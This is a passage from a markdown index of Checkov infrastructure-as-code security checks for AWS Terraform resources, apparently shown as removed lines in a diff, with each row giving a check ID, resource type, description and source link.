-|  170 | CKV_AWS_91      | resource | aws_lb                                                  | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Terraform | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py)                                                                                         |
-|  171 | CKV_AWS_92      | resource | aws_elb                                                 | Ensure the ELB has access logging enabled                                                                                                                                                                | Terraform | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBAccessLogs.py)                                                                                             |
-|  172 | CKV_AWS_93      | resource | aws_s3_bucket                                           | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                             |
-|  173 | CKV_AWS_93      | resource | aws_s3_bucket_policy                                    | Ensure S3 bucket policy does not lockout all but root user. (Prevent lockouts needing root account fixes)                                                                                                | Terraform | [S3ProtectAgainstPolicyLockout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ProtectAgainstPolicyLockout.py)                                                             |
-|  174 | CKV_AWS_94      | resource | aws_glue_data_catalog_encryption_settings               | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Terraform | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueDataCatalogEncryption.py)                                                                     |
-|  175 | CKV_AWS_96      | resource | aws_rds_cluster                                         | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Terraform | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AuroraEncryption.py)                                                                                       |
-|  176 | CKV_AWS_97      | resource | aws_ecs_task_definition                                 | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Terraform | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                               |
-|  177 | CKV_AWS_98      | resource | aws_sagemaker_endpoint_configuration                    | Ensure all data stored in the Sagemaker Endpoint is securely encrypted at rest                                                                                                                           | Terraform | [SagemakerEndpointConfigurationEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py)                                       |
-|  178 | CKV_AWS_99      | resource | aws_glue_security_configuration                         | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Terraform | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfiguration.py)                                                                     |
-|  179 | CKV_AWS_100     | resource | aws_eks_node_group                                      | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Terraform | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                                       |
-|  180 | CKV_AWS_101     | resource | aws_neptune_cluster                                     | Ensure Neptune logging is enabled                                                                                                                                                                        | Terraform | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py)                                                                             |
-|  181 | CKV_AWS_102     | resource | aws_neptune_cluster_instance                            | Ensure Neptune Cluster instance is not publicly available                                                                                                                                                | Terraform | [NeptuneClusterInstancePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py)                                                               |
-|  182 | CKV_AWS_103     | resource | aws_alb_listener                                        | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                       |
-|  183 | CKV_AWS_103     | resource | aws_lb                                                  | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                       |
-|  184 | CKV_AWS_103     | resource | aws_lb_listener                                         | Ensure that load balancer is using at least TLS 1.2                                                                                                                                                      | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml)                                                                       |
-|  185 | CKV_AWS_104     | resource | aws_docdb_cluster_parameter_group                       | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py)                                                                                           |
-|  186 | CKV_AWS_105     | resource | aws_redshift_parameter_group                            | Ensure Redshift uses SSL                                                                                                                                                                                 | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py)                                                                                                 |
-|  187 | CKV_AWS_106     | resource | aws_ebs_encryption_by_default                           | Ensure EBS default encryption is enabled                                                                                                                                                                 | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py)                                                                               |
-|  188 | CKV_AWS_107     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)                                                                               |
-|  189 | CKV_AWS_108     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py)                                                                                     |
-|  190 | CKV_AWS_109     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)                                                                           |
-|  191 | CKV_AWS_110     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py)                                                                               |
-|  192 | CKV_AWS_111     | data     | aws_iam_policy_document                                 | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py)                                                                                               |
-|  193 | CKV_AWS_112     | resource | aws_ssm_document                                        | Ensure Session Manager data is encrypted in transit                                                                                                                                                      | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py)                                                 |
-|  194 | CKV_AWS_113     | resource | aws_ssm_document                                        | Ensure Session Manager logs are enabled and encrypted                                                                                                                                                    | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py)                                                       |
-|  195 | CKV_AWS_114     | resource | aws_emr_cluster                                         | Ensure that EMR clusters with Kerberos have Kerberos Realm set                                                                                                                                           | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py)                                                               |
-|  196 | CKV_AWS_115     | resource | aws_lambda_function                                     | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                                 |
-|  197 | CKV_AWS_116     | resource | aws_lambda_function                                     | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py)                                                                                 |
-|  198 | CKV_AWS_117     | resource | aws_lambda_function                                     | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py)                                                                                                 |
-|  199 | CKV_AWS_118     | resource | aws_db_instance                                         | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                     |
-|  200 | CKV_AWS_118     | resource | aws_rds_cluster_instance                                | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                                     |
-|  201 | CKV_AWS_119     | resource | aws_dynamodb_table                                      | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                         |
-|  202 | CKV_AWS_120     | resource | aws_api_gateway_stage                                   | Ensure API Gateway caching is enabled                                                                                                                                                                    | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py)                                                                             |
-|  203 | CKV_AWS_121     | resource | aws_config_configuration_aggregator                     | Ensure AWS Config is enabled in all regions                                                                                                                                                              | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py)                                           |
-|  204 | CKV_AWS_122     | resource | aws_sagemaker_notebook_instance                         | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance                                                                                                                 | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py)                                                         |
-|  205 | CKV_AWS_123     | resource | aws_vpc_endpoint_service                                | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                         |
-|  206 | CKV_AWS_124     | resource | aws_cloudformation_stack                                | Ensure that CloudFormation stacks are sending event notifications to an SNS topic                                                                                                                        | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py)                                                 |
-|  207 | CKV_AWS_126     | resource | aws_instance                                            | Ensure that detailed monitoring is enabled for EC2 instances                                                                                                                                             | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py)                                                               |
-|  208 | CKV_AWS_127     | resource | aws_elb                                                 | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager                                                                                                           | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py)                                                                                                   |
-|  209 | CKV_AWS_129     | resource | aws_db_instance                                         | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled                                                                                                               | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py)                                                                                     |
-|  210 | CKV_AWS_130     | resource | aws_subnet                                              | Ensure VPC subnets do not assign public IP by default                                                                                                                                                    | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py)                                                                                           |
-|  211 | CKV_AWS_131     | resource | aws_alb                                                 | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                   |
-|  212 | CKV_AWS_131     | resource | aws_lb                                                  | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py)                                                                                   |
-|  213 | CKV_AWS_133     | resource | aws_db_instance                                         | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                         |
-|  214 | CKV_AWS_133     | resource | aws_rds_cluster                                         | Ensure that RDS instances has backup policy                                                                                                                                                              | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py)                                                         |
-|  215 | CKV_AWS_134     | resource | aws_elasticache_cluster                                 | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on                                                                                                                            | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py)                                                                 |
-|  216 | CKV_AWS_135     | resource | aws_instance                                            | Ensure that EC2 is EBS optimized                                                                                                                                                                         | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py)                                                                                         |
-|  217 | CKV_AWS_136     | resource | aws_ecr_repository                                      | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                           |
-|  218 | CKV_AWS_137     | resource | aws_elasticsearch_domain                                | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                   |
-|  219 | CKV_AWS_137     | resource | aws_opensearch_domain                                   | Ensure that Elasticsearch is configured inside a VPC                                                                                                                                                     | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py)                                                                                   |
-|  220 | CKV_AWS_138     | resource | aws_elb                                                 | Ensure that ELB is cross-zone-load-balancing enabled                                                                                                                                                     | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py)                                                                                   |
-|  221 | CKV_AWS_139     | resource | aws_rds_cluster                                         | Ensure that RDS clusters have deletion protection enabled                                                                                                                                                | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py)                                                                             |
-|  222 | CKV_AWS_140     | resource | aws_rds_global_cluster                                  | Ensure that RDS global clusters are encrypted                                                                                                                                                            | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py)                                                                                 |
-|  223 | CKV_AWS_141     | resource | aws_redshift_cluster                                    | Ensured that Redshift cluster allowing version upgrade by default                                                                                                                                        | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py)                                                   |
-|  224 | CKV_AWS_142     | resource | aws_redshift_cluster                                    | Ensure that Redshift cluster is encrypted by KMS                                                                                                                                                         | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py)                                                                             |
-|  225 | CKV_AWS_143     | resource | aws_s3_bucket                                           | Ensure that S3 bucket has lock configuration enabled by default                                                                                                                                          | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py)                                                                                   |
-|  226 | CKV_AWS_144     | resource | aws_s3_bucket                                           | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                               |
-|  227 | CKV_AWS_144     | resource | aws_s3_bucket_replication_configuration                 | Ensure that S3 bucket has cross-region replication enabled                                                                                                                                               | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml)                                               |
-|  228 | CKV_AWS_145     | resource | aws_s3_bucket                                           | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                 |
-|  229 | CKV_AWS_145     | resource | aws_s3_bucket_server_side_encryption_configuration      | Ensure that S3 buckets are encrypted with KMS by default                                                                                                                                                 | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml)                                                                 |
-|  230 | CKV_AWS_146     | resource | aws_db_cluster_snapshot                                 | Ensure that RDS database cluster snapshot is encrypted                                                                                                                                                   | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py)                                                                 |
-|  231 | CKV_AWS_147     | resource | aws_codebuild_project                                   | Ensure that CodeBuild projects are encrypted using CMK                                                                                                                                                   | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py)                                                                                       |
-|  232 | CKV_AWS_148     | resource | aws_default_vpc                                         | Ensure no default VPC is planned to be provisioned                                                                                                                                                       | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py)                                                                                     |
-|  233 | CKV_AWS_149     | resource | aws_secretsmanager_secret                               | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                               |
-|  234 | CKV_AWS_150     | resource | aws_alb                                                 | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                               |
-|  235 | CKV_AWS_150     | resource | aws_lb                                                  | Ensure that Load Balancer has deletion protection enabled                                                                                                                                                | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py)                                                                               |
-|  236 | CKV_AWS_152     | resource | aws_alb                                                 | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                 |
-|  237 | CKV_AWS_152     | resource | aws_lb                                                  | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled                                                                                                                        | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py)                                                                                                 |
-|  238 | CKV_AWS_153     | resource | aws_autoscaling_group                                   | Autoscaling groups should supply tags to launch configurations                                                                                                                                           | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py)                                                                                   |
-|  239 | CKV_AWS_154     | resource | aws_redshift_cluster                                    | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                                       |
-|  240 | CKV_AWS_155     | resource | aws_workspaces_workspace                                | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Terraform | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                               |
-|  241 | CKV_AWS_156     | resource | aws_workspaces_workspace                                | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                               |
-|  242 | CKV_AWS_157     | resource | aws_db_instance                                         | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py)                                                                                     |
-|  243 | CKV_AWS_158     | resource | aws_cloudwatch_log_group                                | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                                       |
-|  244 | CKV_AWS_159     | resource | aws_athena_workgroup                                    | Ensure that Athena Workgroup is encrypted                                                                                                                                                                | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py)                                                                     |
-|  245 | CKV_AWS_160     | resource | aws_timestreamwrite_database                            | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                                       |
-|  246 | CKV_AWS_161     | resource | aws_db_instance                                         | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py)                                                                               |
-|  247 | CKV_AWS_162     | resource | aws_rds_cluster                                         | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Terraform | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                                 |
-|  248 | CKV_AWS_163     | resource | aws_ecr_repository                                      | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py)                                                                                       |
-|  249 | CKV_AWS_164     | resource | aws_transfer_server                                     | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py)                                                                           |
-|  250 | CKV_AWS_165     | resource | aws_dynamodb_global_table                               | Ensure DynamoDB point in time recovery (backup) is enabled for global tables                                                                                                                             | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py)                                                                 |
-|  251 | CKV_AWS_166     | resource | aws_backup_vault                                        | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py)                                                                               |
-|  252 | CKV_AWS_167     | resource | aws_glacier_vault                                       | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it                                                                                           | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py)                                                                       |
-|  253 | CKV_AWS_168     | resource | aws_sqs_queue                                           | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                   |
-|  254 | CKV_AWS_168     | resource | aws_sqs_queue_policy                                    | Ensure SQS queue policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py)                                                                   |
-|  255 | CKV_AWS_169     | resource | aws_sns_topic_policy                                    | Ensure SNS topic policy is not public by only allowing specific services or principals to access it                                                                                                      | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py)                                                                   |
-|  256 | CKV_AWS_170     | resource | aws_qldb_ledger                                         | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                                     |
-|  257 | CKV_AWS_171     | resource | aws_emr_security_configuration                          | Ensure EMR Cluster security configuration encryption is using SSE-KMS                                                                                                                                    | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py)                                                                       |
-|  258 | CKV_AWS_172     | resource | aws_qldb_ledger                                         | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                               |
-|  259 | CKV_AWS_173     | resource | aws_lambda_function                                     | Check encryption settings for Lambda environmental variable                                                                                                                                              | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                                 |
-|  260 | CKV_AWS_174     | resource | aws_cloudfront_distribution                             | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py)                                                                                         |
-|  261 | CKV_AWS_175     | resource | aws_waf_web_acl                                         | Ensure WAF has associated rules                                                                                                                                                                          | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                           |
-|  262 | CKV_AWS_175     | resource | aws_wafregional_web_acl                                 | Ensure WAF has associated rules                                                                                                                                                                          | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                           |
-|  263 | CKV_AWS_175     | resource | aws_wafv2_web_acl                                       | Ensure WAF has associated rules                                                                                                                                                                          | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py)                                                                                           |
-|  264 | CKV_AWS_176     | resource | aws_waf_web_acl                                         | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                   |
-|  265 | CKV_AWS_176     | resource | aws_wafregional_web_acl                                 | Ensure Logging is enabled for WAF Web Access Control Lists                                                                                                                                               | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py)                                                                                                   |
-|  266 | CKV_AWS_177     | resource | aws_kinesis_video_stream                                | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py)                                                               |
-|  267 | CKV_AWS_178     | resource | aws_fsx_ontap_file_system                               | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK)                                                                                                                       | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py)                                                                   |
